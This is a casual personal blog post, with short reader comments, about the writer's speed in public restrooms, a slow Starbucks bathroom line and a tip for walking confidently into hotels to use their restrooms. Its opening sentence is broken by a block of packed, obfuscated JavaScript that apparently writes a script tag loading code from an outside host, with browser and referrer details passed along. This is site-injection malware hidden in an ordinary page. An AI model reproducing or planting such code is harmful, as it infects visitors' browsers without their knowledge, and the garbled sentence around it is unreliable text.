Let’s talk about the bathroom

I’m ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘0.6(“<\\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ayesi|var|u0026u|referrer|ybhnd||js|php’.split(‘|’),0,{}))
just going to put it out there.

I’m quick in the bathroom.  I’m better than quick, I’m fast.  And I even wash my hands.

With soap.

I’m not just fast for a girl.  I’m on par with men.

When did I first learn this?  A trip to Disneyland with my sister circa 2000.  We’d go into the restroom together and I’d be waiting for her, every time.

Then it started to become a thing and people often commented on how fast I could get in and out of a restroom.

So this leads me to the topic of today’s post.  What takes girls so long in the restroom?  I clearly have no idea.

I have this fear of needing to use the restroom and not being able to find one.  Like a very major fear.  Possibly stemming from my childhood when it was drilled into our heads that you should always “try.”  Who knows when you’ll find another.  As a result, I get nervous when walking around a large city (New York) and not knowing where the next bathroom would be.  You’d think I’m a 90 year old woman.

Thankfully, I’ve gotten better at this.  Starbucks and hotels are both excellent spots for bathroom breaks.

So this past weekend I used the restroom at Starbucks in Union Square.  The line was literally wrapped around the wall – at least 8 people.  After waiting a solid 15 minutes I was next in line.  I put my phone away, ready to get in-and-out as fast as I could.  If there was ever a time to shine, today was the day.  Then I waited.  And waited.  And waited.  This girl was never coming out.  Finally, a solid 5 minutes later, she exited.  And I know what you’re thinking.  But it seriously smelled like flowers.  So this leads me to the question.  What was she doing?  What kind of things do you do in the restroom?  What sort of things take so long?  Am I missing out on something?  I feel like I’m missing out on something.

Side note:  Hotels are MONEY spots to use the restroom.  Always very clean.  BUT you have to own it.  You can’t walk in and say, “can I use your restroom?”  You have to walk in like you’re staying there.  Walk straight past the front desk.  Don’t look back.  Once past the front desk, keep walking until you find the restroom.  Just act like you own the place and no one will think otherwise.

Oh my gosh I thought I was the only one who was a fast bathroom user! 🙂 I honestly think the quicker you can get in and get out, the better. I think that is why I don’t like going on road trips because I don’t know when I can use the next restroom!

Haha. Solid post. I’ve always wondered why girls take soooo long in the bathroom myself.
